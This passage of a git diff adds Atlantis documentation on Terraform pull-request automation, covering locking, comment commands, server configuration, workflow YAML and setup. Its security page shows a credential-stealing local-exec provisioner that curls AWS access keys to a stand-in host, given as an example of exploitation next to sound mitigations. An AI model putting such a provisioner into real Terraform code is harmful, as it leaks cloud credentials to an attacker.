+If another user attempts to `plan` for the same directory and workspace in a different pull request
+they'll see this error:
+
+![Lock Comment](./images/lock-comment.png)
+
+Which links them to the pull request that holds the lock.
+
+::: warning NOTE
+Only the directory in the repo and Terraform workspace are locked, not the whole repo.
+:::
+
+[[toc]]
+
+## Why
+1. Because `atlantis apply` is run before the pull request is merged, after
+an apply your `master` branch no longer represents the most up-to-date version of your
+infrastructure. With locking, you can ensure that no other changes will be made until the
+pull request is merged.
+
+::: tip Why not apply on merge?
+Sometimes `terraform apply` fails. If the apply were to fail after the pull
+request was merged, you would need to create a new pull request to fix it.
+With locking + applying on the branch, you effectively mimic merging to master
+but with the added ability to re-plan/apply multiple times if things don't work.
+:::
+2. If there is already a `plan` in progress, other users won't see a plan that
+will be made invalid after the in-progress plan is applied.
+
+## Viewing Locks
+To view locks, go to the URL that Atlantis is hosted at:
+
+![Locks View](./images/locks-ui.png)
+
+You can click on a lock to view its details:
+
+![Lock Detail View](./images/lock-detail-ui.png)
+
+## Unlocking
+To unlock the project and workspace without completing an `apply` and merging, click the
+**"To discard this plan click here"** link at the bottom of the plan comment to discard the
+plan and delete the lock:
+
+![Delete Lock Comment](./images/lock-delete-comment.png)
+
+The link will take you to the lock detail view where you can click **Discard Plan and Unlock**
+to delete the lock.
+
+Once a plan is discarded, you'll need to run `plan` again prior to running `apply` when you go back to that pull request.
+
+## Relationship to Terraform State Locking
+Atlantis does not conflict with [Terraform State Locking](https://www.terraform.io/docs/state/locking.html). Under the hood, all
+Atlantis is doing is running `terraform plan` and `apply`, so the locking built into
+those commands by Terraform isn't affected.
+
+In more detail, Terraform state locking locks the state while you run `terraform apply`
+so that multiple applies can't run concurrently. Atlantis's locking is at a higher
+level because it prevents multiple pull requests from working on the same state.
diff --git a/runatlantis.io/docs/pull-request-commands.md b/runatlantis.io/docs/pull-request-commands.md
new file mode 100644
index 0000000000..94dc8260f3
--- /dev/null
+++ b/runatlantis.io/docs/pull-request-commands.md
@@ -0,0 +1,57 @@
+# Pull Request Commands
+Atlantis currently supports three commands that can be run via pull request comments:
+[[toc]]
+
+## atlantis help
+![Help Command](./images/pr-comment-help.png)
+```bash
+atlantis help
+```
+**Explanation**: View help
+
+---
+## atlantis plan
+![Plan Command](./images/pr-comment-plan.png)
+```bash
+atlantis plan [options] -- [terraform plan flags]
+```
+**Explanation**: Runs `terraform plan` on the pull request's branch. You may wish to re-run plan after Atlantis has already done
+so if you've changed some resources manually.
+
+Options:
+* `-d directory` Which directory to run plan in relative to root of repo. Use `.` for root. Defaults to root.
+ * Ex. `atlantis plan -d child/dir`
+* `-p project` Which project to run plan for. Refers to the name of the project configured in the repo's [`atlantis.yaml` file](/docs/atlantis-yaml-reference.html). Cannot be used at same time as `-d` or `-w` because the project defines this already.
+* `-w workspace` Switch to this [Terraform workspace](https://www.terraform.io/docs/state/workspaces.html) before planning. Defaults to `default`. If not using Terraform workspaces you can ignore this.
+* `--verbose` Append Atlantis log to comment.
+
+Additional Terraform flags:
+
+If you need to run `terraform plan` with additional arguments, like `-target=resource`, `-var 'foo=bar'` or `-var-file myfile.tfvars`,
+you can append them to the end of the comment after `--`, ex.
+```
+atlantis plan -d dir -- -var 'foo=bar'
+```
+If you always need to append a certain flag, see [Project-Specific Customization](#project-specific-customization).
+
+---
+## atlantis apply
+![Apply Command](./images/pr-comment-apply.png)
+```bash
+atlantis apply [options] -- [terraform apply flags]
+```
+**Explanation**: Runs `terraform apply` for the plan generated previously that matches the directory/project/workspace.
+
+Options:
+* `-d directory` Apply the plan for this directory, relative to root of repo. Use `.` for root. Defaults to root.
+* `-p project` Apply the plan for this project. Refers to the name of the project configured in the repo's [`atlantis.yaml` file](/docs/atlantis-yaml-reference.html). Cannot be used at same time as `-d` or `-w`.
+* `-w workspace` Apply the plan for this [Terraform workspace](https://www.terraform.io/docs/state/workspaces.html). Defaults to `default`. If not using Terraform workspaces you can ignore this.
+* `--verbose` Append Atlantis log to comment.
+
+Additional Terraform flags:
+
+Because, under the hood, Atlantis runs `terraform apply` on the planfile generated in the previous step, any Terraform options that would change the plan are ignored:
+* `-target=resource`
+* `-var 'foo=bar'`
+* `-var-file=myfile.tfvars`
+
+If you would like to specify these flags, do so when running `atlantis plan`.
diff --git a/runatlantis.io/docs/security.md b/runatlantis.io/docs/security.md
new file mode 100644
index 0000000000..b26da1e6c2
--- /dev/null
+++ b/runatlantis.io/docs/security.md
@@ -0,0 +1,44 @@
+# Security
+[[toc]]
+## Exploits
+Because you usually run Atlantis on a server with credentials that allow access to your infrastructure, it's important that you deploy Atlantis securely.
+
+Atlantis could be exploited by:
+* Running `terraform apply` on a malicious Terraform file with [local-exec](https://www.terraform.io/docs/provisioners/local-exec.html)
+```tf
+resource "null_resource" "null" {
+ provisioner "local-exec" {
+ command = "curl https://cred-stealer.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
+ }
+}
+```
+* Running malicious hook commands specified in an `atlantis.yaml` file.
+* Someone adding `atlantis plan/apply` comments on your valid pull requests, causing Terraform to run when you don't want it to.
+
+## Mitigations
+### Don't Use On Public Repos
+Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos until Atlantis gets an authentication system.
+
+### Don't Use `--allow-fork-prs`
+If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false)
+because anyone can open up a pull request from their fork to your repo.
+
+### `--repo-whitelist`
+Atlantis requires you to specify a whitelist of repositories it will accept webhooks from via the `--repo-whitelist` flag.
+For example:
+* Specific repositories: `--repo-whitelist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
+* Your whole organization: `--repo-whitelist=github.com/runatlantis/*`
+* Every repository in your GitHub Enterprise install: `--repo-whitelist=github.yourcompany.com/*`
+* All repositories: `--repo-whitelist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret.
+
+This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.
+
+### Webhook Secrets
+Atlantis should be run with webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables.
+Even with the `--repo-whitelist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is whitelisted.
+Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
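+
+As a sketch of what the secret provides: GitHub sends an HMAC-SHA256 of each payload in the `X-Hub-Signature-256` header, so given a captured request body (`payload.json` is a placeholder) you could verify a delivery yourself:
+
+```bash
+# Recompute the signature GitHub attaches to each webhook; the hex digest
+# should match the X-Hub-Signature-256 header (minus the "sha256=" prefix).
+openssl dgst -sha256 -hmac "$ATLANTIS_GH_WEBHOOK_SECRET" < payload.json
+```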
+
+### SSL/HTTPS
+If you're using webhook secrets but your traffic is over HTTP then the webhook secrets
+could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file`
+flags.
diff --git a/runatlantis.io/docs/server-configuration.md b/runatlantis.io/docs/server-configuration.md
new file mode 100644
index 0000000000..27d1f94de6
--- /dev/null
+++ b/runatlantis.io/docs/server-configuration.md
@@ -0,0 +1,92 @@
+# Server Configuration
+This documentation explains how to configure the Atlantis server and how to deal
+with credentials.
+
+[[toc]]
+
+Configuration for `atlantis server` can be specified via command line flags, environment variables or a YAML config file.
+Config file values are overridden by environment variables which in turn are overridden by flags.
+
+## YAML
+To use a yaml config file, run atlantis with `--config /path/to/config.yaml`.
+The keys of your config file should be the same as the flag names, ex.
+```yaml
+---
+gh-token: ...
+log-level: ...
+```
+
+## Environment Variables
+All flags can be specified as environment variables. Convert the flag's `-`s to `_`s, uppercase all the letters, and prefix the result with `ATLANTIS_`.
+For example, `--gh-user` can be set via the environment variable `ATLANTIS_GH_USER`.
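+
+For example, these two invocations are equivalent (a sketch; the values are placeholders):
+
+```bash
+# Using flags...
+atlantis server --gh-user my-atlantis-bot --log-level debug
+
+# ...or the corresponding environment variables.
+ATLANTIS_GH_USER=my-atlantis-bot ATLANTIS_LOG_LEVEL=debug atlantis server
+```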
+
+To see a list of all flags and their descriptions, run `atlantis server --help`.
+
+::: warning
+The flag `--atlantis-url` is set by the environment variable `ATLANTIS_ATLANTIS_URL` **NOT** `ATLANTIS_URL`.
+:::
+
+## AWS Credentials
+Atlantis simply shells out to `terraform` so you don't need to do anything special with AWS credentials.
+As long as `terraform` commands work where you're hosting Atlantis, Atlantis will work.
+See [https://www.terraform.io/docs/providers/aws/#authentication](https://www.terraform.io/docs/providers/aws/#authentication) for more detail.
+
+### Multiple AWS Accounts
+Atlantis supports multiple AWS accounts through the use of Terraform's
+[AWS Authentication](https://www.terraform.io/docs/providers/aws/#authentication).
+
+If you're using the [Shared Credentials file](https://www.terraform.io/docs/providers/aws/#shared-credentials-file)
+you'll need to ensure the server that Atlantis is executing on has the corresponding credentials file.
+
+If you're using [Assume role](https://www.terraform.io/docs/providers/aws/#assume-role)
+you'll need to ensure that the credentials file has a `default` profile that is able
+to assume all required roles.
+
+[Environment variables](https://www.terraform.io/docs/providers/aws/#environment-variables) authentication
+won't work for multiple accounts since Atlantis wouldn't know which environment variables to execute
+Terraform with.
+
+### Assume Role Session Names
+Atlantis injects the Terraform variable `atlantis_user` and sets it to the GitHub username of
+the user that is running the Atlantis command. This can be used to dynamically name the assume role
+session which would allow you to view the GitHub username associated with the AWS API calls
+being made during a `plan` or `apply` in CloudWatch.
+
+To take advantage of this feature, use Terraform's [built-in support](https://www.terraform.io/docs/providers/aws/#assume-role) for assume role
+and use the `atlantis_user` Terraform variable:
+
+```hcl
+provider "aws" {
+ assume_role {
+ role_arn = "arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME"
+ session_name = "${var.atlantis_user}"
+ }
+}
+
+variable "atlantis_user" {
+ default = "atlantis_user"
+}
+```
+
+If you're also using the [S3 Backend](https://www.terraform.io/docs/backends/types/s3.html)
+make sure to add the `role_arn` option:
+
+```hcl
+terraform {
+ backend "s3" {
+ bucket = "mybucket"
+ key = "path/to/my/key"
+ region = "us-east-1"
+ role_arn = "arn:aws:iam::ACCOUNT_ID:role/ROLE_NAME"
+ # can't use var.atlantis_user as the session name because
+ # interpolations are not allowed in backend configuration
+ # session_name = "${var.atlantis_user}" WON'T WORK
+ }
+}
+```
+
+Terraform doesn't support interpolations in backend config so you will not be
+able to use `session_name = "${var.atlantis_user}"`. However, the backend assumed
+role is only used for state-related API actions. Any other API actions will be performed using
+the assumed role specified in the `aws` provider and will have the session named as the GitHub user.
+
diff --git a/runatlantis.io/docs/upgrading-atlantis-yaml-to-version-2.md b/runatlantis.io/docs/upgrading-atlantis-yaml-to-version-2.md
new file mode 100644
index 0000000000..b91a125ed3
--- /dev/null
+++ b/runatlantis.io/docs/upgrading-atlantis-yaml-to-version-2.md
@@ -0,0 +1,188 @@
+# Upgrading atlantis.yaml To Version 2
+These docs describe how to upgrade your `atlantis.yaml` file from the format used
+in previous versions to the latest format.
+
+## Single atlantis.yaml
+If you had multiple `atlantis.yaml` files, one per directory, then you'll need to
+consolidate them into a single `atlantis.yaml` file at the root of the repo.
+
+For example, if you had a directory structure:
+```
+.
+├── project1
+│   └── atlantis.yaml
+└── project2
+    └── atlantis.yaml
+```
+
+Then your new structure would look like:
+```
+.
+├── atlantis.yaml
+├── project1
+└── project2
+```
+
+And your `atlantis.yaml` would look something like:
+```yaml
+version: 2
+projects:
+- dir: project1
+ terraform_version: my-version
+ workflow: project1-workflow
+- dir: project2
+ terraform_version: my-version
+ workflow: project2-workflow
+workflows:
+ project1-workflow:
+ ...
+ project2-workflow:
+ ...
+```
+
+We will talk more about `workflows` below.
+
+## Terraform Version
+The `terraform_version` key moved from being a top-level key to being set per `project`,
+so if before your `atlantis.yaml` was in directory `mydir` and looked like:
+```yaml
+terraform_version: 0.11.0
+```
+
+Then your new config would be:
+```yaml
+version: 2
+projects:
+- dir: mydir
+ terraform_version: 0.11.0
+```
+
+## Workflows
+Workflows are the new way to set all `pre_*`, `post_*` and `extra_arguments`.
+
+Each `project` can have a custom workflow via the `workflow` key.
+```yaml
+version: 2
+projects:
+- dir: .
+ workflow: myworkflow
+```
+
+Workflows are defined as a top-level key:
+```yaml
+version: 2
+projects:
+...
+
+workflows:
+ myworkflow:
+ ...
+```
+
+To start with, determine whether you're customizing commands that happen during
+`plan` or `apply`. You then set that key under the workflow's name:
+```yaml
+...
+workflows:
+ myworkflow:
+ plan:
+ steps:
+ ...
+ apply:
+ steps:
+ ...
+```
+
+If you're not customizing a specific stage then you can omit that key. For example
+if you're only customizing the commands that happen during `plan` then your config
+will look like:
+```yaml
+...
+workflows:
+ myworkflow:
+ plan:
+ steps:
+ ...
+```
+
+### Extra Arguments
+`extra_arguments` is now specified as follows. Given a previous config:
+```yaml
+extra_arguments:
+ - command_name: init
+ arguments:
+ - "-lock=false"
+ - command_name: plan
+ arguments:
+ - "-lock=false"
+ - command_name: apply
+ arguments:
+ - "-lock=false"
+```
+
+Your config would now look like:
+```yaml
+...
+workflows:
+ myworkflow:
+ plan:
+ steps:
+ - init:
+ extra_args: ["-lock=false"]
+ - plan:
+ extra_args: ["-lock=false"]
+ apply:
+ steps:
+ - apply:
+ extra_args: ["-lock=false"]
+```
+
+
+### Pre/Post Commands
+Instead of using `pre_*` or `post_*`, you can now insert your custom commands
+before/after the built-in commands. Given a previous config:
+
+```yaml
+pre_init:
+ commands:
+ - "curl http://example.com"
+# pre_get commands are run when the Terraform version is < 0.9.0
+pre_get:
+ commands:
+ - "curl http://example.com"
+pre_plan:
+ commands:
+ - "curl http://example.com"
+post_plan:
+ commands:
+ - "curl http://example.com"
+pre_apply:
+ commands:
+ - "curl http://example.com"
+post_apply:
+ commands:
+ - "curl http://example.com"
+```
+
+Your config would now look like:
+```yaml
+...
+workflows:
+ myworkflow:
+ plan:
+ steps:
+ - run: curl http://example.com
+ - init
+ - plan
+ - run: curl http://example.com
+ apply:
+ steps:
+ - run: curl http://example.com
+ - apply
+ - run: curl http://example.com
+```
+
+::: tip
+It's important to include the built-in commands: `init`, `plan` and `apply`.
+Otherwise Atlantis won't run the necessary commands to actually plan/apply.
+:::
diff --git a/runatlantis.io/guide/README.md b/runatlantis.io/guide/README.md
new file mode 100644
index 0000000000..32c0f424c3
--- /dev/null
+++ b/runatlantis.io/guide/README.md
@@ -0,0 +1,57 @@
+# Introduction
+
+::: tip Looking for the docs?
+Go here: [www.runatlantis.io/docs](/docs/)
+:::
+
+## Overview
+Atlantis is an application for automating Terraform via pull requests. It is deployed
+as a standalone application into your infrastructure. No third-party has access to
+your credentials.
+
+Atlantis listens for GitHub or GitLab webhooks about Terraform pull requests. It
+then runs `terraform plan` and comments with the output back on the pull request.
+
+When you want to apply, comment `atlantis apply` on the pull request and Atlantis
+will run `terraform apply` and comment back with the output.
+
+Check out the video below to see it in action:
+
+[![Atlantis Walkthrough](./images/atlantis-walkthrough-icon.png)](https://www.youtube.com/watch?v=TmIPWda0IKg)
+
+## Try it out
+If you'd like to try out running Atlantis on an example repo check out the [Test Drive](test-drive.html).
+
+## Why would you run Atlantis?
+### Increased visibility
+When everyone is executing Terraform on their own computers, it's hard to know the
+current state of your infrastructure:
+* Is what's in `master` deployed?
+* Did someone forget to create a pull request for that latest change?
+* What was the output from that last `terraform apply`?
+
+With Atlantis, everything is visible on the pull request. You can view the history
+of everything that was done to your infrastructure.
+
+### Enable collaboration with everyone
+You probably don't want to distribute Terraform credentials to everyone in your
+engineering organization, but now anyone can open up a Terraform pull request.
+
+You can require approval before the pull request is applied so nothing happens
+accidentally.
+
+### Review Terraform pull requests better
+You can't fully review a Terraform change without seeing the output of `terraform plan`.
+Now that output is added to the pull request automatically.
+
+### Standardize your workflows
+Atlantis locks a directory/workspace until the pull request is merged or the lock
+is manually deleted. This ensures that changes are applied in the order expected.
+
+The exact commands that Atlantis runs are configurable. You can run custom scripts
+to construct your ideal workflow.
+
+## Next Steps
+* If you'd like to try out Atlantis on a test repo, check out the [Test Drive](test-drive.html).
+* If you're ready to deploy it on your own repos, check out [Getting Started](getting-started.html).
+* If you're wondering if Atlantis supports how you run Terraform, read [Requirements](requirements.html).
\ No newline at end of file
diff --git a/runatlantis.io/guide/atlantis-yaml-use-cases.md b/runatlantis.io/guide/atlantis-yaml-use-cases.md
new file mode 100644
index 0000000000..f01da6fc38
--- /dev/null
+++ b/runatlantis.io/guide/atlantis-yaml-use-cases.md
@@ -0,0 +1,251 @@
+# atlantis.yaml Use Cases
+
+An `atlantis.yaml` file can be placed in the root of each repository to configure
+how Atlantis runs. This documentation describes some use cases.
+
+::: tip
+Looking for the full atlantis.yaml reference? See [atlantis.yaml Reference](../docs/atlantis-yaml-reference.html).
+:::
+
+[[toc]]
+
+## Disabling Autoplanning
+```yaml
+version: 2
+projects:
+- dir: project1
+ autoplan:
+ enabled: false
+```
+This will stop Atlantis from automatically running plan when `project1/` is updated
+in a pull request.
+
+## Configuring Autoplanning
+Given the directory structure:
+```
+.
+├── modules
+│   └── module1
+│       ├── main.tf
+│       ├── outputs.tf
+│       └── submodule
+│           ├── main.tf
+│           └── outputs.tf
+└── project1
+    └── main.tf
+```
+If you wanted Atlantis to autoplan `project1/` whenever any `.tf` file under `module1/`
+changed, you could use the following configuration:
+
+```yaml
+version: 2
+projects:
+- dir: project1
+ autoplan:
+ when_modified: ["../modules/**/*.tf", "*.tf"]
+```
+Note:
+* `when_modified` uses the [`.dockerignore` syntax](https://docs.docker.com/engine/reference/builder/#dockerignore-file)
+* The paths are relative to the project's directory.
+
+## Supporting Terraform Workspaces
+```yaml
+version: 2
+projects:
+- dir: project1
+ workspace: staging
+- dir: project1
+ workspace: production
+```
+With the above config, when Atlantis determines that the configuration for the `project1` dir has changed,
+it will run plan for both the `staging` and `production` workspaces.
+
+If you want to `plan` or `apply` for a specific workspace you can use
+```
+atlantis plan -w staging -d project1
+```
+and
+```
+atlantis apply -w staging -d project1
+```
+
+## Using .tfvars files
+Given the structure:
+```
+.
+└── project1
+    ├── main.tf
+    ├── production.tfvars
+    └── staging.tfvars
+```
+
+If you wanted Atlantis to automatically run plan with `-var-file staging.tfvars` and `-var-file production.tfvars`
+you could use the following config:
+
+```yaml
+version: 2
+projects:
+# If two or more projects have the same dir and workspace, they must also have
+# a 'name' key to differentiate them.
+- name: project1-staging
+ dir: project1
+ # NOTE: the key here is 'workflow' not 'workspace'
+ workflow: staging
+- name: project1-production
+ dir: project1
+ workflow: production
+
+workflows:
+ staging:
+ plan:
+ steps:
+ - init
+ - plan:
+ extra_args: ["-var-file", "staging.tfvars"]
+ production:
+ plan:
+ steps:
+ - init
+ - plan:
+ extra_args: ["-var-file", "production.tfvars"]
+```
+Here we're defining two projects with the same directory but with different
+`workflow`s.
+
+If you wanted to manually plan one of these projects you could use
+```
+atlantis plan -p project1-staging
+```
+Where `-p` refers to the project name.
+
+When you want to apply the plan, you can run
+```
+atlantis apply -p project1-staging
+```
+
+::: warning Why can't you use atlantis apply -d project1?
+Atlantis outputs the plan for both workflows into the `project1` directory, so it
+needs a way to differentiate between the plans.
+:::
+
+## Adding extra arguments to Terraform commands
+If you need to append flags to `terraform plan` or `apply` temporarily, you can
+append them to the comment after `--`, for example commenting:
+```
+atlantis plan -- -lock=false
+```
+This would cause Atlantis to run `terraform plan -lock=false`.
+
+If you always need to do this for a project's `init`, `plan` or `apply` commands
+then you must define the project's steps and set the `extra_args` key for the
+command you need to modify.
+
+```yaml
+version: 2
+projects:
+- dir: project1
+ workflow: myworkflow
+workflows:
+ myworkflow:
+ plan:
+ steps:
+ - init:
+ extra_args: ["-lock=false"]
+ - plan:
+ extra_args: ["-lock=false"]
+ apply:
+ steps:
+ - apply:
+ extra_args: ["-lock=false"]
+```
+
+## Running custom commands
+Atlantis supports running custom commands. In this example, we want to run
+a script after every `apply`:
+
+```yaml
+version: 2
+projects:
+- dir: project1
+ workflow: myworkflow
+workflows:
+ myworkflow:
+ apply:
+ steps:
+ - apply
+ - run: ./my-custom-script.sh
+```
+
+::: tip
+Note how we're not specifying the `plan` key under `myworkflow`. If the `plan` key
+isn't set, Atlantis will use the default plan workflow which is what we want in this case.
+:::
+
+## Terraform Versions
+If you'd like to use a different version of Terraform than what is in Atlantis's
+`PATH` then set the `terraform_version` key:
+
+```yaml
+version: 2
+projects:
+- dir: project1
+ terraform_version: 0.10.0
+```
+
+Atlantis will then execute all Terraform commands with `terraform0.10.0` instead
+of `terraform`. This requires that the 0.10.0 binary is in Atlantis's `PATH` with the
+name `terraform0.10.0`.
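+
+A sketch of installing such a binary (the URL follows HashiCorp's standard release path; adjust the OS/arch suffix as needed):
+
+```bash
+# Download Terraform 0.10.0 and install it under the name Atlantis expects.
+curl -LO https://releases.hashicorp.com/terraform/0.10.0/terraform_0.10.0_linux_amd64.zip
+unzip terraform_0.10.0_linux_amd64.zip
+mv terraform /usr/local/bin/terraform0.10.0
+```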
+
+## Requiring Approvals For Production
+In this example, we only want to require `apply` approvals for the `production` directory.
+```yaml
+version: 2
+projects:
+- dir: staging
+- dir: production
+ apply_requirements: [approved]
+```
+::: tip
+By default, there are no apply requirements, so we only need to specify the `apply_requirements` key for production.
+:::
+
+
+## Custom Backend Config
+If you need to specify the `-backend-config` flag to `terraform init` you'll need to use an `atlantis.yaml` file.
+In this example, we're using custom backend files to configure two remote states, one for each environment.
+We're then using `.tfvars` files to load different variables for each environment.
+
+```yaml
+version: 2
+projects:
+- name: staging
+ dir: .
+ workflow: staging
+- name: production
+ dir: .
+ workflow: production
+workflows:
+ staging:
+ plan:
+ steps:
+      - run: rm -rf .terraform
+ - init:
+ extra_args: [-backend-config=staging.backend.tfvars]
+ - plan:
+ extra_args: [-var-file=staging.tfvars]
+ production:
+ plan:
+ steps:
+      - run: rm -rf .terraform
+ - init:
+ extra_args: [-backend-config=production.backend.tfvars]
+ - plan:
+ extra_args: [-var-file=production.tfvars]
+```
+::: warning NOTE
+We have to use a custom `run` step to `rm -rf .terraform` because otherwise Terraform
+will complain between commands since the backend config has changed.
+:::
+
+## Next Steps
+Check out the full [`atlantis.yaml` Reference](../docs/atlantis-yaml-reference.html) for more details.
\ No newline at end of file
diff --git a/runatlantis.io/guide/getting-started.md b/runatlantis.io/guide/getting-started.md
new file mode 100644
index 0000000000..d455de04a5
--- /dev/null
+++ b/runatlantis.io/guide/getting-started.md
@@ -0,0 +1,171 @@
+# Getting Started
+These instructions are for running Atlantis locally so you can test it out against
+your own repositories before deciding whether to install it more permanently.
+
+::: tip
+If you want to set up a production-ready Atlantis installation, read [Deployment](../docs/deployment.html).
+:::
+
+Steps:
+
+[[toc]]
+
+## Install Terraform
+`terraform` needs to be in the `$PATH` for Atlantis.
+Download from [https://www.terraform.io/downloads.html](https://www.terraform.io/downloads.html)
+```
+unzip path/to/terraform_*.zip -d /usr/local/bin
+```
+
+## Download Atlantis
+Get the latest release from [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases)
+and unpack it.
+
+## Download Ngrok
+Atlantis needs to be accessible somewhere that github.com/gitlab.com or your GitHub/GitLab Enterprise installation can reach.
+One way to accomplish this is with ngrok, a tool that forwards your local port to a random
+public hostname.
+
+Go to [https://ngrok.com/download](https://ngrok.com/download), download ngrok and `unzip` it.
+
+Start `ngrok` on port `4141` and take note of the hostname it gives you:
+```bash
+./ngrok http 4141
+```
+
+In a new tab (where you'll soon start Atlantis) create an environment variable with
+ngrok's hostname:
+```bash
+URL=https://{YOUR_HOSTNAME}.ngrok.io
+```
+
+## Create a Webhook Secret
+GitHub and GitLab use webhook secrets so clients can verify that the webhooks came
+from them. Create a random string of any length (you can use [https://www.random.org/strings/](https://www.random.org/strings/))
+and set an environment variable:
+```
+SECRET={YOUR_RANDOM_STRING}
+```
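+
+If you have `openssl` available, one way to generate a suitable string (a sketch; any sufficiently random string works):
+
+```bash
+# Generate and export a 64-character hex secret in one step.
+SECRET=$(openssl rand -hex 32)
+```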
+
+## Add Webhook
+Take the URL that ngrok output and create a webhook in your GitHub or GitLab repo:
+
+### GitHub
+- Go to your repo's settings
+- Select **Webhooks** or **Hooks** in the sidebar
+- Click **Add webhook**
+- set **Payload URL** to your ngrok URL with `/events` at the end. Ex. `https://c5004d84.ngrok.io/events`
+- double-check you added `/events` to the end of your URL.
+- set **Content type** to `application/json`
+- set **Secret** to your random string
+- select **Let me select individual events**
+- check the boxes
+ - **Pull request reviews**
+ - **Pushes**
+ - **Issue comments**
+ - **Pull requests**
+- leave **Active** checked
+- click **Add webhook**
+
+### GitLab
+- Go to your repo's home page
+- Click **Settings > Integrations** in the sidebar
+- set **URL** to your ngrok URL with `/events` at the end. Ex. `https://c5004d84.ngrok.io/events`
+- double-check you added `/events` to the end of your URL.
+- set **Secret Token** to your random string
+- check the boxes
+ - **Push events**
+ - **Comments**
+ - **Merge Request events**
+- leave **Enable SSL verification** checked
+- click **Add webhook**
+
+## Create an access token for Atlantis
+We recommend using a dedicated CI user or creating a new user named **@atlantis** that performs all API actions; however, for testing,
+you can use your own user. Here we'll create the access token that Atlantis uses to comment on the pull request and
+set commit statuses.
+
+### GitHub
+- follow [https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/#creating-a-token](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/#creating-a-token)
+- create a token with **repo** scope
+- set the token as an environment variable
+```
+TOKEN={YOUR_TOKEN}
+```
+
+### GitLab
+- follow [https://docs.gitlab.com/ce/user/profile/personal_access_tokens.html#creating-a-personal-access-token](https://docs.gitlab.com/ce/user/profile/personal_access_tokens.html#creating-a-personal-access-token)
+- create a token with **api** scope
+- set the token as an environment variable
+```
+TOKEN={YOUR_TOKEN}
+```
+
+## Start Atlantis
+You're almost ready to start Atlantis; just set one more variable:
+
+```
+USERNAME={the username of your GitHub or GitLab user}
+```
+Now you can start Atlantis. The exact command differs depending on your Git host:
+
+### GitHub
+```
+atlantis server --atlantis-url $URL --gh-user $USERNAME --gh-token $TOKEN --gh-webhook-secret $SECRET
+```
+
+### GitHub Enterprise
+```
+HOSTNAME=YOUR_GITHUB_ENTERPRISE_HOSTNAME # ex. github.runatlantis.io, without the scheme
+atlantis server --atlantis-url $URL --gh-user $USERNAME --gh-token $TOKEN --gh-webhook-secret $SECRET --gh-hostname $HOSTNAME
+```
+
+### GitLab
+```
+atlantis server --atlantis-url $URL --gitlab-user $USERNAME --gitlab-token $TOKEN --gitlab-webhook-secret $SECRET
+```
+
+### GitLab Enterprise
+```
+HOSTNAME=YOUR_GITLAB_ENTERPRISE_HOSTNAME # ex. gitlab.runatlantis.io, without the scheme
+atlantis server --atlantis-url $URL --gitlab-user $USERNAME --gitlab-token $TOKEN --gitlab-webhook-secret $SECRET --gitlab-hostname $HOSTNAME
+```
+
+## Create a pull request
+Create a pull request so you can test Atlantis.
+::: tip
+You could add a null resource as a test:
+```hcl
+resource "null_resource" "example" {}
+```
+Or just modify the whitespace in a file.
+:::
+
+### Autoplan
+You should see Atlantis logging about receiving the webhook and you should see the output of `terraform plan` on your repo.
+
+Atlantis tries to figure out the directory to plan in based on the files modified.
+If you need to customize the directories that Atlantis runs in, or the commands it runs (if you're using workspaces
+or `.tfvars` files), see [atlantis.yaml Reference](../docs/atlantis-yaml-reference.html).
+
+### Manual Plan
+To manually `plan` in a specific directory or workspace, comment on the pull request using the `-d` or `-w` flags:
+```
+atlantis plan -d mydir
+atlantis plan -w staging
+```
+
+To add additional arguments to the underlying `terraform plan` you can use:
+```
+atlantis plan -- -target=resource -var 'foo=bar'
+```
+
+### Apply
+If you'd like to `apply`, type a comment: `atlantis apply`. You can use the `-d` or `-w` flags to point
+Atlantis at a specific plan. Otherwise it tries to apply the plan for the root directory.
+
+## Next Steps
+* You're done! Hopefully Atlantis is working with your repo and you're ready to move on to a [production-ready deployment](../docs/deployment.html).
+* If it's not working as expected, you may need to customize how Atlantis runs with an `atlantis.yaml` file.
+See [atlantis.yaml Reference](../docs/atlantis-yaml-reference.html).
+* Check out our full documentation for more details: [Documentation](../docs/).
diff --git a/docs/atlantis-walkthrough-icon.png b/runatlantis.io/guide/images/atlantis-walkthrough-icon.png
similarity index 100%
rename from docs/atlantis-walkthrough-icon.png
rename to runatlantis.io/guide/images/atlantis-walkthrough-icon.png
diff --git a/runatlantis.io/guide/requirements.md b/runatlantis.io/guide/requirements.md
new file mode 100644
index 0000000000..0681a0b93e
--- /dev/null
+++ b/runatlantis.io/guide/requirements.md
@@ -0,0 +1,85 @@
+# Requirements
+
+[[toc]]
+
+## Git Host
+* GitHub (public, private or enterprise)
+* GitLab (public, private or enterprise)
+
+If you would like support for BitBucket, please add a :+1: to [this ticket](https://github.com/runatlantis/atlantis/issues/30)
+and click "Subscribe" to be notified when support is available.
+
+## Remote State
+Atlantis supports all remote state backends. It **does not** support local state
+because it does not commit the modified state files back to version control.
+
+## Repository Structure
+Atlantis supports any Terraform project structure, for example:
+
+### Single Terraform project at repo root
+```
+.
+├── main.tf
+└── ...
+```
+
+### Multiple project folders
+```
+.
+├── project1
+│   ├── main.tf
+│   └── ...
+└── project2
+    ├── main.tf
+    └── ...
+```
+
+### Modules
+```
+.
+├── project1
+│   ├── main.tf
+│   └── ...
+└── modules
+    └── module1
+        ├── main.tf
+        └── ...
+```
+With modules, if you want `project1` automatically planned when `module1` is modified
+you need to create an `atlantis.yaml` file. See [atlantis.yaml Use Cases](atlantis-yaml-use-cases.html#configuring-autoplanning) for more details.
+
+### Terraform Workspaces
+::: tip
+See [Terraform's docs](https://www.terraform.io/docs/state/workspaces.html) if you are unfamiliar with workspaces.
+:::
+If you're using a Terraform version >= 0.9.0, Atlantis supports workspaces through an
+`atlantis.yaml` file that tells Atlantis the names of your workspaces
